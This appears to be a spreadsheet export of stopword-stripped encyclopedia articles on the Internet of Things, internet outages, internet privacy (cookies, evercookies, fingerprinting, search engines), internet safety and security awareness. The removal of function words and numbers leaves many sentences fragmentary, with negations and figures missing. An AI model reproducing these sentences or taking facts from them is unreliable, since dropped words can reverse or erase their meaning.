controller). head node decides data created, stored, transmitted. contrast, decentralized attempts divide systems smaller divisions. head node authorizes partial decision making power lower level sub-nodes mutual agreed policy. performance improved, especially huge systems millions nodes.decentralized attempts address limited bandwidth hashing capacity battery-powered wireless devices lightweight blockchain.cyberattack identification done early detection mitigation edge nodes traffic monitoring evaluation. complexity semi-open closed loops (i.e. value chains, whenever global finality settled) often considered studied complex system huge number different links, interactions autonomous actors, capacity integrate actors. overall stage (full open loop) likely seen chaotic environment (since systems always finality). practical approach, elements internet things global, public space. subsystems often implemented mitigate risks privacy, control reliability. example, domestic robotics (domotics) running inside smart home might share data within available local network. managing controlling high dynamic things/devices network tough task traditional networks architecture, software defined networking (sdn) provides agile dynamic solution cope special requirements diversity innovative applications. size considerations internet things would encode trillion objects, able follow movement objects. human beings surveyed urban environments surrounded 1000 5000 trackable objects. 2015 million smart devices people's homes. this number expected grow million devices 2020.the figure online capable devices grew 2016 2017 reach billion. space considerations internet things, precise geographic location thing—and also precise geographic dimensions thing—will critical. therefore, facts thing, location time space, less critical track person processing information decide whether information important action taken, missing information decide take action). (note things internet things sensors, sensor location usually important.) geoweb digital earth promising applications become possible things become organized connected location. however, challenges remain include constraints variable spatial scales, need handle massive amounts data, indexing fast search neighbour operations. internet things, things able take actions initiative, human-centric mediation role eliminated. thus, time-space context humans take granted must given central role information ecosystem. just standards play role internet web, geo-spatial standards play role internet things. solution "basket remotes" many devices potential take piece market. jean-louis gassée (apple initial alumni team, beos co-founder) addressed topic article monday note, predicts likely problem calls "basket remotes" problem, we'll hundreds applications interface hundreds devices share protocols speaking another. improved user interaction, technology leaders joining forces create standards communication devices solve problem. others turning concept predictive interaction devices, "where collected data used predict trigger actions specific devices" making work together. social internet things social internet things (siot) kind focuses importance social interaction relationship devices. siot pattern cross-domain devices enabling application application communication collaboration without human intervention order serve owners autonomous services, realized gained low-level architecture support software hardware engineering. social network devices (not human) defines device identity like citizen community, connect internet provide services users. siot defines social network devices interact different goals serve human. siot different iot? siot different original terms collaboration characteristics. passive, serve dedicated purposes existing devices predetermined system. siot active, programmed managed serve unplanned purposes match potential devices different systems benefit users. siot works? devices built-in sociability broadcast abilities functionalities, time discovers, navigates groups devices nearby network useful service compositions order help users proactively every day's life especially emergency. social examples iot-based smart home technology monitors health data patients aging adults analyzing physiological parameters prompt nearby health facilities emergency medical services needed. case emergency, automatically, ambulance nearest available hospital called pickup location provided, ward assigned, patient's health data transmitted emergency department, display doctor's computer immediately action. sensors vehicles, road traffic lights monitor conditions vehicles drivers alert attention needed also coordinate automatically ensure autonomous driving working normally. unfortunately accident happens, camera inform nearest hospital police station help. social challenges internet things multifaceted complicated. main factors hindering people adopting internet things (iot) based products services complexity. installation setup challenge people, therefore, need devices match configure automatically provide different services different situation. system security always concern technology, crucial siot security oneself need considered also mutual trust mechanism collaborative devices time time, place place. another critical challenge siot accuracy reliability sensors. circumstances, sensors would need respond nanoseconds avoid accidents, injury, loss life. enabling technologies there many technologies enable iot. crucial field network used communicate devices installation, role several wireless wired technologies fulfill: addressability original idea auto-id center based rfid-tags distinct identification electronic product code. this evolved objects address uri. alternative view, world semantic focuses instead making things (not electronic, smart, rfid-enabled) addressable existing naming protocols, uri. objects converse, referred agents, powerful centralised servers acting human owners. integration internet implies devices address distinct identifier. limited address space ipv4 (which allows billion different addresses), objects next generation internet protocol (ipv6) scale extremely large address space required. internet-of-things devices additionally benefit stateless address auto-configuration present ipv6, reduces configuration overhead hosts, ietf 6lowpan header compression. large extent, future internet things possible without support ipv6; consequently, global adoption ipv6 coming years critical successful development future. application layer adrc defines application layer protocol supporting framework implementing applications. short-range wireless bluetooth mesh networking specification providing mesh networking variant bluetooth energy (ble) increased number nodes standardized application layer (models). light-fidelity (li-fi) wireless communication technology similar wi-fi standard, using visible light communication increased bandwidth. near-field communication (nfc) communication protocols enabling electronic devices communicate within range. radio-frequency identification (rfid) technology using electromagnetic fields read data stored tags embedded items. wi-fi technology local area networking based ieee 802.11 standard, devices communicate shared access point directly individual devices. zigbee communication protocols personal area networking based ieee 802.15.4 standard</t>
  </si>
  <si>
    <t>Internet outage</t>
  </si>
  <si>
    <t>internet outage internet blackout internet shutdown complete partial failure internet services. occur censorship, cyberattacks, disasters, police security services actions errors. disruptions submarine communications cables cause blackouts slowdowns large areas. countries less developed internet infrastructure vulnerable small numbers high-capacity links. line research finds internet "hub-like" core structure makes robust random losses nodes also fragile targeted attacks components highly connected nodes "hubs". types government blackout government internet blackout deliberate shut civilian internet access government small area many large areas country. such shut typically used means information control brief period upheaval transition. impede ability protesters insurgent forces mobilize organize. also serves prevent real-time information access foreign people entities. reactions leaders, journalists, observers others foreign countries delayed. military blackout temporary disconnection civilian internet access military forces important aspect information warfare. this tactic common today, often used concert ground invasion conventional forces. could also used advance airstrike campaign. weather natural disaster extreme weather events natural disasters lead internet outages either directly destroying local infrastructure indirectly damaging local electricity grid. monash observatory kaspr datahaus tracked impact hurricane florence 2018, cyclone fani 2018, hurricane laura 2020. solar storms solar superstorms could cause large-scale global months-long internet outages. researchers describes potential mitigation measures exceptions user-powered mesh networks, related peer-to-peer applications protocols robustness current internet infrastructure. cyberattack accident measurement variety organizations measure internet shutdowns including open observatory network interference, access now, freedom house, digital society project (using v-dem institute methodology infrastructure), opennet initiative, university michigan's censored planet observatory, internet censorship lab, monash observatory. these organizations range methods detect shutdowns expert analysis, remote sensing, remote sensing oversight. some organizations, access now, maintain active lists internet shutdowns. expert analysis several organizations expert analysis identify internet shutdowns. some, digital society project (dsp), send surveys experts around world, aggregate results single score. internet shutdowns, asks "how often government shut domestic access internet?" answers range "extremely often" "never almost never." freedom house's freedom report also uses expert analysis assess whether internet shutdowns occurred, instead surveying multiple experts, freedom house identifies partners single expert conduct analysis. freedom house asks question "does government intentionally disrupt internet cellphone networks response political social events, whether temporary long term, localized nationwide?" generally expert analyses prone false positives fewer false negatives (i.e. identifying shutdowns sources cannot confirm), remote sensing methods manual oversight. remote sensing other organizations various remote sensing techniques identify shutdowns. some organizations, open observatory network interference, internet censorship monash ip-observatory automated remote sensing methods detect internet shutdowns. open observatory network interference uses software installed computers volunteers around world detect shutdowns. however methods prone false positives, false negatives, various technical challenges.in order address concerns, organizations implemented various methods oversight. organizations access opennet initiative methods. access uses technological methods detect shutdowns, confirms shutdowns using news reports, reports local activists, official government statements, statements isps. opennet initiative volunteers install software computers check websites access points around world, confirms results manual observations. these methods prone false negatives fewer false positives (i.e. shutdowns sources identify confirmed sources) expert analyses.a comparatively method detecting internet shutdowns remote sensing automated oversight. these methods praised ethical efficient endanger in-country volunteers. however methods produce regular datasets. list prevention internet outages prevented resilient, decentralized internet architecture. management modern society, especially developed countries, depends heavily internet communication. there measures taken possibilities exist managing countering large-scale internet outage. temporary alternative forms communication meshnets also references external links internet could crash. need plan talk danny hillis redecentralize.org</t>
  </si>
  <si>
    <t>Internet privacy</t>
  </si>
  <si>
    <t>internet privacy involves right mandate personal privacy concerning storing, repurposing, provision third parties, displaying information pertaining oneself internet. internet privacy subset data privacy. privacy concerns articulated beginnings large-scale computer sharing.privacy entail either personally identifiable information (pii) non-pii information site visitor's behaviour website. refers information used identify individual. example, physical address alone could identify individual without explicitly disclosing name, factors unique enough identify specific person typically. other forms soon include tracking data used apps, daily commute routine information enough identify individual.it suggested "appeal online services broadcast personal information purpose." hand, essay "the value privacy", security expert bruce schneier says, "privacy protects abuses power, even we're nothing wrong time surveillance." levels privacy internet digital privacy viewed differently traditional expectations privacy. internet privacy primarily concerned protecting user information. professor jerry kang explains term privacy expresses space, decision, information. terms space, individuals expectation physical spaces (e.g. homes, cars) intruded. privacy within realm decision best illustrated overturned landmark case wade. lastly, information privacy regards collection user information variety sources, produces great discussion.in united states, 1997 information infrastructure task force (iitf) created president clinton defined information privacy individual's claim control terms personal information information identifiable individual acquired, disclosed, used." 1990s, rise internet, became clear governments, companies, organisations would need abide rules protect individuals' privacy. with rise internet mobile networks internet privacy daily concern users. people casual concern internet privacy need achieve total anonymity. internet users protect privacy controlled disclosure personal information. revelation addresses, non-personally-identifiable profiling, similar information might become acceptable trade-offs convenience users could otherwise lose using workarounds needed suppress details rigorously. hand, people desire much stronger privacy. case, achieve internet anonymity ensure privacy internet without giving third parties ability link internet activities personally-identifiable information internet user. order keep information private, people need careful submit look online. when filling forms buying merchandise, information tracked private, companies send internet users spam advertising similar products. there also several governmental organizations protect individual's privacy anonymity internet, point. article presented ftc, october 2011, number pointers brought attention helps individual internet user avoid possible identity theft cyber-attacks. preventing limiting usage social security numbers online, wary respectful emails including spam messages, mindful personal financial details, creating managing strong passwords, intelligent web-browsing behaviors recommended, among others.posting things internet harmful expose people malicious attacks. some information posted internet persists decades, depending terms service, privacy policies particular services offered online. this include comments written blogs, pictures, websites, facebook twitter. absorbed cyberspace posted, anyone potentially find access some employers research potential employee searching online details online behaviors, possibly affecting outcome success candidate. risks internet privacy companies hired track websites people visit information, instance sending advertising based one's browsing history. there many ways people divulge personal information, instance "social media" sending bank credit card information various websites. moreover, directly observed behaviour, browsing logs, search queries, contents facebook profile automatically processed infer potentially intrusive details individual, sexual orientation, political religious views, race, substance use, intelligence, personality.those concerned internet privacy often cite number privacy risks events compromise privacy encountered online activities. these range gathering statistics users malicious acts spreading spyware exploitation various forms bugs (software faults). several social networking websites protect personal information subscribers, well provide warning privacy terms agreement. facebook, example, privacy settings available registered users: block certain individuals seeing profile, choose "friends", limit access pictures videos. privacy settings also available social networking websites google plus twitter. user apply settings providing personal information internet. electronic frontier foundation created guides users easily privacy settings zebra crossing: easy-to-use digital safety checklist volunteer-maintained online resource. late 2007, facebook launched beacon program user rental records released public friends see. many people enraged breach privacy, lane facebook, inc. case ensued.children adolescents often internet (including social media) ways risk privacy: cause growing concern among parents. young people also realize information browsing tracked visiting particular site protect privacy. they must informed risks. example, twitter, threats include shortened links lead potentially harmful websites content. email threats include email scams attachments persuade users install malware disclose personal information. torrent sites, threats include malware hiding video, music, software downloads. when using smartphone, threats include geolocation, meaning one's phone detect one's location post online see. users protect updating virus protection, using security settings, downloading patches, installing firewall, screening email, shutting spyware, controlling cookies, using encryption, fending browser hijackers, blocking pop-ups.however people little idea things. many businesses hire professionals take care issues, individuals best educate themselves.in 1998, federal trade commission considered lack privacy children internet created children online privacy protection (coppa). coppa limits options gather information children created warning labels potential harmful information content presented. 2000, children's internet protection (cipa) developed implement internet safety policies. policies required taking technology protection measures filter block children's internet access pictures harmful them. schools libraries need follow requirements order receive discounts e-rate program. these laws, awareness campaigns, parental adult supervision strategies, internet filters help make internet safer children around world.the privacy concerns internet users pose serious challenge (dunkan, 1996; till, 1997). owing advancement technology, access internet become easier device time. however, increase access multiple sources increases number access points attack. online survey, approximately seven individuals responded worries privacy internet, rather mail phone. internet privacy slowly surely becoming threat, person's personal data slip wrong hands passed around web. internet protocol (ip) addresses websites receive many track address visitor's computer. companies match data time associate name, address, information address. there ambiguity private addresses are. court justice european union ruled need treated personally identifiable information website tracking them, third party like service provider, knows name street address address holder, would true static addresses, dynamic addresses.california regulations addresses need treated personal information business itself, third party, link name street address.an alberta court ruled police obtain addresses names addresses associated without search warrant; calgary, alberta police found addresses initiated online crimes. service provider gave police names addresses associated addresses. http cookies http cookie data stored user's computer assists automated access websites features, state information required complex sites. also used user-tracking storing special usage history data cookie, cookies example, used google analytics called tracking cookies. cookies common concern field internet privacy. although website developers commonly cookies legitimate technical purposes, cases abuse occur. 2009, researchers noted social networking profiles could connected cookies, allowing social networking profile connected browsing habits.in past, websites generally made user explicitly aware storing cookies, however tracking cookies especially third-party tracking cookies commonly used ways compile long-term records individuals' browsing histories privacy concern prompted european lawmakers take action 2011. cookies also implications computer forensics. past years, computer users completely aware cookies, users become conscious possible detrimental effects internet cookies: recent study done shown users deleted cookies computer least once, users delete cookies computer every month. since cookies advertisers' main targeting potential customers, customers deleting cookies, advertisers started persistent flash cookies zombie cookies, modern browsers anti-malware software block detect remove cookies. original developers cookies intended website originally distributed cookies users could retrieve them, therefore returning data already possessed website. however, practice programmers circumvent restriction. possible consequences include: placing personally-identifiable browser facilitate profiling (see below), cross-site scripting techniques steal information user's cookies.cookies benefits. websites frequently visits require password, cookies allow user sign every time. cookie also track one's preferences show websites might interest them. cookies make websites free without type payment. some benefits also seen negative. example, common ways theft hackers taking one's username password cookie saves. while many sites free, sell space advertisers. these ads, personalized one's likes, sometimes freeze one's computer cause annoyance. cookies mostly harmless except third-party cookies. these cookies made website banner advertising companies. these third-party cookies dangerous take information regular cookies browsing habits frequently visited websites, share information companies. cookies often associated pop-up windows windows often, always, tailored person's preferences. these windows irritation close button strategically hidden unlikely part screen. worst cases, pop-up take screen tries close them, take another unwanted website. cookies seen negatively understood unnoticed someone simply surfing internet. idea every move makes internet watched, would frighten users. some users choose disable cookies browsers. such action reduce privacy risks, severely limit prevent functionality many websites. significant browsers disabling ability built-in, external program required. alternative, users frequently delete stored cookies. some browsers (such mozilla firefox opera) offer option clear cookies automatically whenever user closes browser. third option involves allowing cookies general, preventing abuse. there also host wrapper applications redirect cookies cache data location. concerns exist privacy benefits deleting cookies over-stated.the process profiling (also known "tracking") assembles analyzes several events, attributable single originating entity, order gain information (especially patterns activity) relating originating entity. some organizations engage profiling people's browsing, collecting urls sites visited. resulting profiles potentially link information personally identifies individual browsing. some web-oriented marketing-research organizations practice legitimately, example: order construct profiles "typical internet users". such profiles, describe average trends large groups internet users rather actual individuals, prove useful market analysis. although aggregate data constitute privacy violation, people believe initial profiling does. profiling becomes contentious privacy issue data-matching associates profile individual personally-identifiable information individual. governments organizations honeypot websites featuring controversial topics purpose attracting tracking unwary people. this constitutes potential danger individuals. flash cookies when users choose disable http cookies reduce privacy risks noted, types cookies invented: since cookies advertisers' main targeting potential customers, customers deleting cookies, advertisers started persistent flash cookies zombie cookies. 2009 study, flash cookies found popular mechanism storing data visited sites. another 2011 study social media found that, sites, least overlap http flash cookies." however, modern browsers anti-malware software block detect remove cookies. flash cookies, also known local shared objects, work ways normal cookies used adobe flash player store information user's computer. they exhibit similar privacy risk normal cookies, easily blocked, meaning option browsers accept cookies affect flash cookies. view control browser extensions add-ons. flash cookies unlike http cookies sense transferred client back server. browsers read write cookies track data usage.although browsers internet explorer firefox added "privacy browsing" setting, still allow flash cookies track user operate fully. however, flash player browser plugin disabled uninstalled, flash cookies disabled per-site global basis. adobe's flash (pdf) reader browser plugins whose past security defects allowed spyware malware installed: also problems oracle's java. evercookies evercookies, created samy kamkar, javascript-based applications produce cookies browser actively "resist" deletion redundantly copying different forms user's machine (e.g., flash local shared objects, various html5 storage mechanisms, window.name caching, etc.), resurrecting copies missing expired. evercookie accomplishes storing cookie data several types storage mechanisms available local browser. ability store cookies types storage mechanisms one's computer never gone. additionally, evercookie found user removed types cookies question, recreates using mechanism available. evercookies type zombie cookie. however, modern browsers anti-malware software block detect remove cookies. anti-fraud uses some anti-fraud companies realized potential evercookies protect catch cyber criminals. these companies already hide small files several places perpetrator's computer hackers usually easily these. advantage evercookies resist deletion rebuild themselves. advertising uses there controversy line drawn technology. cookies store unique identifiers person's computer used predict wants. many advertisement companies want technology track customers looking online. this known online behavioral advertising allows advertisers keep track consumer's website visits personalize target advertisements. evercookies enable advertisers continue track customer regardless whether cookies deleted not. some companies already using technology ethics still widely debated. criticism anonymizer "nevercookies" part free firefox plugin protects evercookies. this plugin extends firefox's private browsing mode users completely protected evercookies. nevercookies eliminate entire manual deletion process keeping cookies users want like browsing history saved account information. device fingerprinting device fingerprint information collected software hardware remote computing device purpose identifying individual devices even persistent cookies (and also zombie cookies) cannot read stored browser, client address hidden, even switches another browser device. this allow service provider detect prevent identity theft credit card fraud, also compile long-term records individuals' browsing histories even they're attempting avoid tracking, raising major concern internet privacy advocates. third party requests third party requests http data connections client devices addresses different website user currently surfing many alternative tracking technologies cookies based third party requests. their importance increased last years even accelerated mozilla (2019), apple (2020), google (2022) announced block third party cookies default. third requests used embedding external content (e.g. advertisements) loading external resources functions (e.g. images, icons, fonts, captchas, jquery resources many others). dependent type resource loaded, requests enable third parties execute device fingerprint place kind marketing tag. irrespective intention, requests often disclose information sensitive, used tracking either directly combination personally identifiable information most requests disclose referrer details reveal full actually visited website. addition referrer information transmitted request methods http post. since 2018 mozilla partially mitigates risk third party requests cutting referrer information using private browsing mode. however, personal information still revealed requested address areas http-header. photographs internet today many people digital cameras post photographs online, example street photography practitioners artistic purposes social documentary photography practitioners document people everyday life. people depicted photos might want appear internet. police arrest photos, considered public record many jurisdictions, often posted internet online shot publishing sites. some organizations attempt respond privacy-related concern. example, 2005 wikimania conference required photographers prior permission people pictures, albeit made impossible photographers practice candid photography public place would violate photographers' free speech rights. some people wore photos" indicate would prefer photo taken (see photo).the harvard review published short piece called face danger: facial recognition privacy law", much explaining "privacy law, current form, help unwillingly tagged." individual unwillingly tagged photo displayed manner might violate personally way, time facebook gets taking photo, many people already chance view, share, distribute furthermore, traditional tort protect people captured photograph public counted invasion privacy. extensive facebook privacy policy covers concerns much more. example, policy states reserve right disclose member information share photos companies, lawyers, courts, government entities, etc. feel absolutely necessary. policy also informs users profile pictures mainly help friends connect other. however, these, well pictures, allow people invade person's privacy finding information used track locate certain individual. article featured news, stated teams scientists found hollywood stars could giving information private whereabouts easily pictures uploaded internet. moreover, found pictures taken phones tablets including iphones automatically attach latitude longitude picture taken metadata unless function manually disabled.face recognition technology used gain access person's private data, according study. researchers carnegie mellon university combined image scanning, cloud computing public profiles social network sites identify individuals offline world. data captured even included user's social security number. experts warned privacy risks faced increased merging online offline identities. researchers also developed 'augmented reality' mobile display personal data person's image captured smartphone screen. since technologies widely available, users' future identities become exposed anyone smartphone internet connection. researchers believe could force reconsideration future attitudes privacy. google street view google street view, released u.s. 2007, currently subject ongoing debate possible infringement individual privacy. article entitled "privacy, reconsidered: representations, data practices, geoweb", sarah elwood agnieszka leszczynski (2011) argue google street view "facilitate[s] identification disclosure immediacy less abstraction." medium street view disseminates information, photograph, immediate sense potentially provide direct information evidence person's whereabouts, activities, private property. moreover, technology's disclosure information person less abstract sense that, photographed, person represented street view virtual replication real-life appearance. words, technology removes abstractions person's appearance personal belongings immediate disclosure person object, visually exist real life. although street view began blur license plates people's faces 2008, technology faulty entirely ensure accidental disclosure identity private property.elwood leszczynski note "many concerns leveled street view stem situations photograph-like images treated definitive evidence individual's involvement particular activities." instance, ruedi noser, swiss politician, barely avoided public scandal photographed 2009 google street view walking woman wife woman actually secretary. similar situations occur street view provides high-resolution photographs photographs hypothetically offer compelling objective evidence. case swiss politician illustrates, even supposedly compelling photographic evidence sometimes subject gross misinterpretation. this example suggests google street view provide opportunities privacy infringement harassment public dissemination photographs. google street view does, however, blur remove photographs individuals private property image frames individuals request blurring and/or removal images. this request submitted, review, "report problem" button located bottom left-hand side every image window google street view, however, google made attempts report problem difficult disabling "why reporting street view" icon. search engines search engines ability track user's searches. personal information revealed searches user's computer, account, address linked search terms used. search engines claimed necessity retain information order provide better services, protect security pressure, protect fraud. search engine takes users assigns specific number. those control database often keep records internet member traveled aol's system example. database million members deep, specific number. aolsearch however, allows keep records websites visited given member. even though true identity user known, full profile member made using information stored aolsearch. keeping records people query aolsearch, company able learn great deal without knowing names.search engines also able retain user information, location time spent using search engine, ninety days. most search engine operators data sense needs must certain areas field. people working legal field also allowed information collected search engine websites. google search engine given example search engine retains information entered period three-fourths year becomes obsolete public usage. yahoo! follows footsteps google sense also deletes user information period ninety days. other search engines ask! search engine promoted tool "askeraser" essentially takes away personal information requested. some changes made internet search engines included google's search engine. beginning 2009, google began system google search became personalized. item searched results shown remembers previous information pertains individual. google search engine seeks searched also strives allow user feel like search engine recognizes interests. this achieved using online advertising. system google uses filter advertisements search results might interest user ranking system tests relevancy includes observation behavior users exude searching google. another function search engines predictability location. search engines able predict one's location currently locating addresses geographical locations.google publicly stated january 2012, privacy policy altered. this policy would change following users: privacy policy would become shorter easier comprehend information users provide would used ways presently used. goal google make users’ experiences better currently are.this privacy policy planned come effect march 2012. peter fleischer, global privacy counselor google, explained person logged his/her google account, he/she logged information gathered multiple google services he/she used order accommodating. google's privacy policy combine data used google's search engines (i.e., youtube gmail) order work along lines person's interests. person, effect, able find he/she wants efficient rate searched information times login help narrow search results.google's privacy policy explains information collect collect information, access update information. google collect information better service users language, find useful people important online. google announces information provide, maintain, protect google users. information google uses give users relevant search results advertisements. privacy policy explains google shared information service google services people google account logged google treat user single user across products. google claims privacy policy benefit users simpler. google will, example, able correct spelling user's friend's name google search notify user late based calendar current location. even though google updating privacy policy, core privacy guidelines change. example, google sell personal information share externally.users public officials raised many concerns regarding google's privacy policy. main concern/issue involves sharing data multiple sources. because policy gathers information data searched multiple engines logged google, uses help assist users, privacy becomes important element. public officials google account users worried online safety information gathered multiple sources.some users like overlapping privacy policy, wishing keep service google separate. update google's privacy policy alarmed public private sectors. european union asked google delay onset privacy policy order ensure violate e.u. law. this move accordance objections decreasing online privacy raised foreign nations surveillance heavily scrutinized. canada germany held investigations legality facebook, respective privacy acts, 2010. privacy policy heightens unresolved concerns regarding user privacy.an additional feature concern google privacy policy nature policy. must accept features delete existing google accounts. update affect google+ social network, therefore making google+’s settings uncustomizable, unlike customizable social networking sites. customizing privacy settings social network tactic many feel necessary social networking sites. this update system google+ users wary continuing service. additionally, fear sharing data amongst google services could lead revelations identities. many using pseudonyms concerned possibility, defend role pseudonyms literature history. some solutions able protect user privacy internet include programs "rapleaf" website search engine allows users make one's search information personal information private. other websites also give option users facebook amazon. privacy focused search engines/browsers search engines startpage.com, disconnect.me scroogle (defunct since 2012) anonymize google searches. some notable privacy-focused search-engines are: brave free software reports privacy-first website browsing services, blocking online trackers ads, tracking users' browsing data. duckduckgo meta-search engine combines search results various search engines (excluding google) providing unique services like using search boxes various websites providing instant answers box. qwant eu-based web-search engine focusing privacy. index servers hosted european union. searx free open source privacy-oriented meta-search engine based number decentralized instances. there number existing public instances, user create desire. fireball germany's first search engine obtains results various sources (mainly bing). fireball collecting user information. servers stationed germany, plus considering german legislation tends respect privacy rights better many european countries. metager meta-search engine (obtains results various sources) germany popular safe search engine. metager uses similar safety features fireball. ixquick dutch-based meta-search engine (obtains results various sources). commits also protection privacy users. ixquick uses similar safety features fireball. yacy decentralized-search engine developed basis community project, started 2005. search engine follows slightly different approach previous ones, using peer-to-peer principle require stationary centralized servers. this disadvantages also simple advantage greater privacy surfing basically possibility hacking. search encrypt internet search engine prioritizes maintaining user privacy avoiding filter bubble personalized search results. differentiates search engines using local encryption searches delayed history expiration. browser free software provides access anonymised network enables anonymous communication. directs internet traffic multiple relays. this encryption method prevents others tracking certain user, thus allowing user's address personal information concealed. privacy issues social networking sites advent caused social profiling growing concern internet privacy. system facilitates participatory information sharing collaboration internet, social networking media websites like facebook, instagram, twitter, myspace. these social networking sites seen boom popularity starting late 2000s. through websites, many people giving personal information internet. topic discussion held accountable collection distribution personal information. some blame social networks, responsible storing information data, others blame users information sites. this relates ever-present issue society regards social media sites. there growing number people discovering risks putting personal information online trusting website keep private. recent study, researchers found young people taking measures keep posted information facebook private degree. examples actions include managing privacy settings certain content visible "only friends" ignoring facebook friend requests strangers.in 2013 class action lawsuit filed facebook alleging company scanned user messages links, translating “likes” user's facebook profile. data lifted private messages used targeted advertising, plaintiffs claimed. "facebook's practice scanning content messages violates federal electronic communications privacy (ecpa also referred wiretap act), well california's invasion privacy (cipa), section 17200 california's business professions code," plaintiffs said. this shows information online longer completely private. increasing risk younger people easier internet access ever before, therefore position easy upload information, caution consider difficult take information open. this becoming bigger issue much society interacts online case fifteen years ago. addition, quickly evolving digital media arena, people's interpretation privacy evolving well, important consider interacting online. forms social networking digital media instagram snapchat call guidelines regarding privacy. what makes difficult wide range opinions surrounding topic, left mainly individual judgement respect people's online privacy circumstances. privacy issues medical applications with rise technology focused applications, rise medical apps available users smart devices. survey migraine management specific applications, researcher minen al.) discovered clear privacy policies, apps stated using user data giving data third parties advertising. concerns raised discusses applications without accessible privacy policies, even applications properly adhering health insurance portability accountability (hipaa) need proper regulation, apps store medical data identifiable information user. internet service providers internet users obtain internet access internet service provider (isp). data transmitted users must pass isp. thus, potential observe users' activities internet. isps breach personal information transaction history, search history, social media profiles users. hackers could opportunity hack obtain sensitive information victims. however, isps usually prohibited participating activities legal, ethical, business, technical reasons. normally isps collect least information consumers using services. from privacy standpoint, isps would ideally collect much information require order provide internet connectivity address, billing information applicable, etc.). which information collects, information, whether informs consumers, pose significant privacy issues. beyond usage collected information typical third parties, isps sometimes state make information available go</t>
  </si>
  <si>
    <t>Internet safety</t>
  </si>
  <si>
    <t>internet safety online safety cyber safety e-safety trying safe internet maximizing user's awareness personal safety security risks private information property associated using internet, self-protection computer crime. number internet users continues grow worldwide, internets, governments, organizations expressed concerns safety children teenagers using internet. over announced endured sort cyber-harassment. safer internet celebrated worldwide february raise awareness internet safety. safe online campaign received sponsorship government agency serious organized crime agency (soca) major internet companies microsoft ebay. information security sensitive information personal information identity, passwords often associated personal property privacy present security concerns leaked. unauthorized access usage private information result consequences identity theft, well theft property. common causes information security breaches include: phishing phishing type scam scammers disguise trustworthy source attempt obtain private information passwords, credit card information, etc. internet. these fake websites often designed look identical legitimate counterparts avoid suspicion user. normally, hackers send third-party email target requesting personal information, entry point implement attack. malware malware, particularly spyware, malicious software designed collect transmit private information, passwords, without user's consent knowledge. they often distributed e-mail, software, files unofficial locations. malware prevalent security concerns often impossible determine whether file infected, regardless source file. personal safety growth internet gave rise many important services accessible anyone connection. important services digital communication. while service allowed communication others internet, also allowed communication malicious users. while malicious users often internet personal gain, limited financial/material gain. this especially concern parents children, children often targets malicious users. common threats personal safety include phishing, internet scams, malware, cyberstalking, cyberbullying, online predators, sextortion. cyberstalking cyberstalking internet electronic means stalk harass individual, group, organization. include false accusations, defamation, slander libel. also include monitoring, identity theft, threats, vandalism, solicitation sex, gathering information used threaten, embarrass harass. cyberstalking crime someone harasses stalks victim using electronic digital means, social media, email, instant messaging (im), messages posted discussion group forum. terms cyberstalking cyberbullying often used interchangeably. cyberbullying cyberbullying electronic means instant messaging, social media, e-mail forms online communication intent abuse, intimidate, overpower individual group. over past decade, cyberbullying identified significant problem youth. 2012 study 11,925 students united states, indicated adolescents reported victim cyberbullying, reported experiencing suicidal behavior. australian esafety commissioner's website reports young australians report socially excluded, threatened abused online.sometimes, takes form posting unverifiable illegal libelous statements harassment websites. these websites advertisements encouraging victims thousands dollars related businesses posts removed temporarily, opposed free permanent removal process available major search engines. online predation online predation engaging underage minor inappropriate sexual relationships internet. online predators attempt initiate seduce minors relationships chat rooms internet forums. obscene/offensive content various websites internet content material deem offensive, distasteful explicit, often user's liking. such websites include internet, shock sites, hate speech otherwise inflammatory content. such content manifest many ways, pop-up unsuspecting links. sextortion sextortion, especially webcams, concern, especially webcams flirting cybersex. often involves cybercriminal posing someone else attractive person initiating communication sexual nature victim. victim persuaded undress front webcam, also persuaded engage sexual behaviour, masturbation. video recorded cybercriminal, reveals true intent demands money services (such explicit images victim, cases online predation), threatening publicly release video send family members friends victim comply. video highlighting dangers sextortion released national crime agency educate people, especially given fact blackmail sexual nature cause humiliation sufficient extent cause victim take life, addition efforts educate public risks sextortion. also control software:accountability software content control softwareidentity fraud internet crime internet fraud internet security procurement online dating services website reputation rating tools groups individuals working topic ahtcc australian high tech crime centre childnet insafe sonia livingstone thinkuknow tween summit youth internet safety survey references external links quotations related internet safety wikiquote</t>
  </si>
  <si>
    <t>Internet security awareness</t>
  </si>
  <si>
    <t>internet security awareness cyber security awareness refers much end-users know cyber security threats networks face, risks introduce mitigating security best practices guide behavior. users considered weakest link primary vulnerability within network. since end-users major vulnerability, technical means improve security enough. organizations could also seek reduce risk human element (end users). this could accomplished providing security best practice guidance users' awareness cyber security. employees could taught common threats avoid mitigate them. cyber security awareness, training, education cyber security risk mitigating user program could consist combination multiple approaches including cyber security awareness, cyber security training, cyber security education. according adopted from, table provides comparison approaches. threats threat agents threat actors perpetrators threat usually look easiest gain access network, often human element. however, cyber threats mitigated. some common threats include limited below. social engineering someone uses compelling story, authority, means convince someone hand sensitive information usernames passwords. user cyber security awareness ability recognize types attacks improves ability avoid them. phishing form social engineering. popular attack attempts trick users clicking link within email website hopes divulge sensitive information. this attack generally relies bulk email approach cost sending phishing emails. targets fooled, many targeted still profitable vector. spear phishing email crafted sent specific person appear legitimate. form phishing, convincing likely succeed traditional phishing emails tailors email victim. deployment range bulk automated process, accessing address book past victim sending simple phishing attacks contacts (thus appearing come recognized past contact), sophisticatedly hand-written communications target specific recipients. vishing voice phishing form social engineering involves contacting individuals traditional landlines, telephony (i.e., voice ip), automated text-to-speech systems, forms voice communications trick divulging sensitive information like credit card data. smishing phishing social engineering leverages text messages vector trick users divulging sensitive information. tailgating physical security social engineering attack unauthorized individual access location following authorized user location without authorized user's knowledge.piggybacking physical security social engineering attack unauthorized individual access location following authorized user location authorized user's knowledge.malware software created used malicious intent. includes range software include limited viruses, trojan horses, worms, rootkits, spyware, crypto-jacking.ransomware another cyber threat attacks carried computer system often result social engineering attack. this type malware encrypts data holds ransom could paralyze whole computer system. internet things (iot) based attacks form cyber threat 21st century beyond leverage vulnerabilities embedded devices found i.e., cars, refrigerators, smart speakers digital assistants. topics there various approaches within cyber security risk mitigating user program (see table above). article geared towards cyber security awareness, following topics could also leveraged cybersecurity training, cyber security education. reflected table, several different delivery methods taken provide cyber security awareness. some include using posters, guides, tips even video newsletters. some possible cyber security awareness topics according include limited following. anti-malware protection: anti-malware sometimes referred anti-virus. this type application used protect systems malicious software preventing, detecting, deleting malware. some popular malware includes computer viruses, ransomware, rootkit, trojan horses, worms. security user awareness guidelines include device scans malware updating anti-malware application definitions.data protection privacy: there various types data might mandated protected unauthorized disclosure, including personally identifiable information (pii), protected health information (phi), 